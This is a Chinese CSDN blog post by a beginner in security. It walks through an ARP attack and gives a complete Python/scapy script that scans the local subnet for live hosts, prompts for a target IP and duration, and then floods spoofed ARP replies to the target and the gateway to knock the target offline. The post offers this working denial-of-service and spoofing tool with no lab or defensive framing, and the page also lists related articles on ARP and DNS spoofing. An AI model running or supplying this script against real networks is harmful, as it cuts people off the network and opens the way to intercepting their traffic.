ARP攻击初探

最新推荐文章于 2024-04-30 19:24:04 发布
最新推荐文章于 2024-04-30 19:24:04 发布
阅读量222 收藏
点赞数
分类专栏: 安全/黑帽子 文章标签: python
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/buzhimingderen/article/details/105569270
版权

@ARP攻击初探

第一步思路

1.攻击指定的IP实现断网——ARP
2.原理:通过扫描当前攻击机的IP地址,得到内网的所有IP所在网关
3.组成ARP数据包,对网关内的主机先发起ping,寻找到存活的主机
4.获得存活主机列表,选择需要攻击的ip,发起攻击

步骤

  1. 获得当前的IP及网关route print
  2. 封装ARP数据包,以太网的包结构形式来发起ping,得到存活主机列表
  3. 得到存活主机列表
  4. 选择需要攻击或阻网IP
  5. ARP攻击(封包/发包)—》代理,抓包
  6. 设置攻击时常

具体实现代码如下

import os
import time
from scapy.all import *

pip install scapy

def scan2spoof():
	netcard = 'Realtek Gaming GbE Family Controller'#攻击使用的网卡
	cmdcode = 'route print'

	# 执行CMD命令获得当前主机IP和网关
	for line in os.popen(cmdcode):
		# 通过line获得IPv4和网关
		s = line.strip()
		if s.startswith('0.0.0.0'):
			iplist = s.split()
			ip = iplist[3]#当前IP
			gw = iplist[2]#网关
			# print(ip)
			# print(gw)
			break
	print("使用的网卡是:{}".format(netcard))
	print("本机的上网IP:{}".format(ip))
	print("本机的上网网关:{}".format(gw))

	# 封装一个ARP的数据包,符合以太网的包定义
	arppk = Ether(dst="ff:ff:ff:ff:ff:ff")/ARP(pdst=gw+"/24")
	ansip,unansip = srp(arppk,iface=netcard,timeout=2,verbose=0)
	print("扫描到{}台在线主机".format(len(ansip)))
	print("扫描到{}台不在线主机".format(len(unansip)))
	
	ansresip = []
	for s,r in ansip:
		ansresip.append([r.psrc,r.hwsrc])#ip,mac
	ansresip.sort()#去重排序
	for ip,mac in ansresip:
		print(ip,"------->",mac)

	#代理/抓包
	# 阻断网络
	vip = input("请输入需要攻击的IP:")
	ttl = int(input("请输入需要攻击的时间(秒):"))#一般测试观察用的话设置20秒左右
	# 以下实现arp攻击即可
	for i in range(ttl*5):
		sendp(Ether(dst="ff:ff:ff:ff:ff:ff")/ARP(pdst=vip,psrc=gw),verbose=0)
		sendp(Ether(dst="ff:ff:ff:ff:ff:ff")/ARP(pdst=gw,psrc=vip),verbose=0)
		time.sleep(0.2)
	print("对{}的ARP攻击完成".format(vip))

if __name__ == '__main__':
	scan2spoof()

插入链接与图片

作者博客: buzhimingderen.

在这里插入图片描述

最后

我是一名小白,刚刚接触安全领域,我尽量坚持在以后的日子里,每周坚持发2-5篇博客。只是以此来激励自己。

zero_DAIDAI
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
arp攻击教程
05-03
arp攻击教程 arp攻击教程 arp攻击教程 arp攻击教程 arp攻击教程
ARP攻击软件
07-06
ARP攻击演示软件,分析攻击原理,积极预防 黑客,小白,白帽子,arparp攻击原理
ettercap局域网内DNS欺骗(隔壁的哥们轻一点 ...)
aozhuo4755的博客
12-13 1838
笔记一:ettercap是什么? 我们在对WEB安全检测的时候都会用到Cain和netfuke这两款工具,功能相信用过的朋友多多少少都知道,但这两款工具是在windows下运行的。 而ettercap是在linux下运行的 。其实功能都是差不多的,我称呼它为嗅探工具,ARP欺骗,DNS,劫持,中间人攻击等等。总之这是一款强大的安全测试工具。 笔记二:DNS简单说明 了解DNS是什...
利用NetFuke进行内网嗅探
w786572258的专栏
01-05 2806
http://blog.csdn.net/u013648937/article/details/44368325
ARP断网攻击和欺骗实现 kali
热门推荐
含笑
04-30 2万+
ARP(Address Resolution Protocol),中文解释为地址解析协议,是根据IP地址获取物理地址的一个TCP/IP协议。 ARP大致工作流程如下: 主机发送信息时将包含目标IP地址的ARP请求广播到网络上的所有主机,并接收返回消息,以此确定目标的物理地址。 收到返回消息后将该IP地址和物理地址存入本机ARP缓存中并保留一定时间,下次请求时直接查询ARP缓存以节
Cain 嗅探 启动 出错 解决办法
收集盒 Book box
07-07 2557
cain安装成功,但是无法启动的情况 提示 应用程序初始化(0xc00000222)失败,请单击确定,终止此应用程序,如图这并不是因为中毒了,或者杀软什么的,而是因为系统的c:\windows\system32\npptools.dll文件被替换了(可能有的系统为了安全故意替换的
易语言ARP欺骗攻击
08-20
易语言ARP欺骗攻击源码系统结构:随机MAC,获取MAC,探测停止,ARP欺骗,Ping探测,自定义ARP,API_SendARP,API_inet_addr, ======程序集1 || ||------_启动子程序 || || ======窗口程序集1 || ||------_DLL_局域网_创建
arp攻击c++代码
03-25
本代码使用mfc和winpcap实现了arp攻击,本代码只供技术学习和交流使用。严禁用于任何其它用途。由本代码造成的损失,本人不承担任何责任。
ARP 攻击监控软件
11-06
防止ARP 攻击的监控软件,我使用了一下,感觉还不错。
SpringBoot中实现发送邮件
最新发布
m0_64289188的博客
04-30 341
当你添加了spring-boot-starter-mail依赖后,Spring Boot会自动配置JavaMailSender实例,并根据application.yml文件中的属性来配置这个实例。你可以直接在需要发送邮件的地方通过@Autowired注解将JavaMailSender实例注入到你的类中,然后使用它来发送邮件。:首先,需要在你的pom.xml文件中添加Spring Boot的邮件发送器依赖。,简化了在Spring Boot应用程序中发送电子邮件的设置过程。Spring Boot的。
[python3] 读取一个正在更新的日志文件
言之。
04-24 988
等同于–follow=name --retry,根据文件名进行追踪,并保持重试,即该文件被删除或改名后,如果再次创建相同的文件名,会继续追踪。这两种方法都会持续监听日志文件的变化,并实时读取新增的日志内容。你可以根据实际需求选择其中一种方法。要读取一个正在更新的日志文件(即实时写入的日志文件),你可以使用 Python 的。的技巧来实现实时读取。函数打开文件,并使用。
Day25-Java基础之常用类1
m0_46053885的博客
04-27 859
同时我们发现Math类中的方法都是静态的,因此在使用的时候我们可以直接通过类名去调用。对于计算机而言,其实是没有数据类型的概念的,都是0101010101,数据类型是编程语言自己规定的,所以在实际存储的时候,先把具体的数字变成二进制,每32个bit为一组,存储在数组中。比较内存地址值一般情况下是没有意义的,我们希望比较的是对象的属性,如果两个对象的属性相同,我们认为就是同一个对象;如果我们的数据是一个浮点类型的数据,有的时候计算机并不会将这个数据完全转换成一个二进制数据,而是将这个将其转换成一个无限的。
链表刷题集
yajunjiao的专栏
04-30 263
本文主要列举了一些刷的题,不多,有那么几道,也建议各位去建立自己的刷题集。积少成多。
superset部署与实践
m0_60125201的博客
04-29 691
本博客简要介绍了superset这个BI工具,使用两种方法来部署superset,并简单介绍了superset的使用。
AttributeError: module ‘numpy‘ has no attribute ‘float‘.的解决方法
chen_znn的博客
04-30 247
本文记录了AttributeError: module 'numpy' has no attribute 'float'.的解决方法
Python 发送钉钉消息(markdown格式)
qq_43773590的博客
04-30 156
【代码】Python 发送钉钉消息(markdown格式)
Python 二叉树的创建与遍历
youyouxiong的博客
04-24 422
Python中创建二叉树并进行遍历,我们首先需要定义一个二叉树节点类,然后创建二叉树,最后实现几种基本的遍历方法:前序、中序、后序和层序遍历。以下是具体的实现步骤: 2. 创建二叉树 创建二叉树通常是由用户根据需要输入节点值来构建,或者通过特定的算法生成。这里我们手动创建一个简单的二叉树: 3. 实现二叉树的遍历 前序遍历 (Preorder Traversal) 访问根节点,然后递归地遍历左子树,最后递归地遍历右子树。 中序遍历 (Inorder Traversal) 递归地遍历左子
python中的元类
weixin_40756114的博客
04-25 903
上面说了类是类的实例的模板,所以你看类的__new__被定义为一个绑定的类方法,类本身是作为方法的第一个参数,一般命名为cls,一般情况下,__new__不需要其他的参数,__new__根据cls来产生一个实例,__new__返回产生的实例,也有tuple等少数例外__new__需要额外的参数,绝大多数情况是不需要的。正如类是类的实例的工厂,元类则是类的工厂。不过这两种关系还是有所不同,类是类的实例的模版,但元类不是类的模版,元类更像一个纯粹的类的组装工厂。
ARP欺骗和ARP攻击
03-27
ARP欺骗和ARP攻击是一种网络攻击方式,攻击者利用ARP协议的漏洞,通过发送虚假的ARP请求或ARP响应来欺骗网络设备,使其将数据发送到错误的目的地或接收错误的数据。 在ARP欺骗攻击中,攻击者发送虚假的ARP请求,让...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值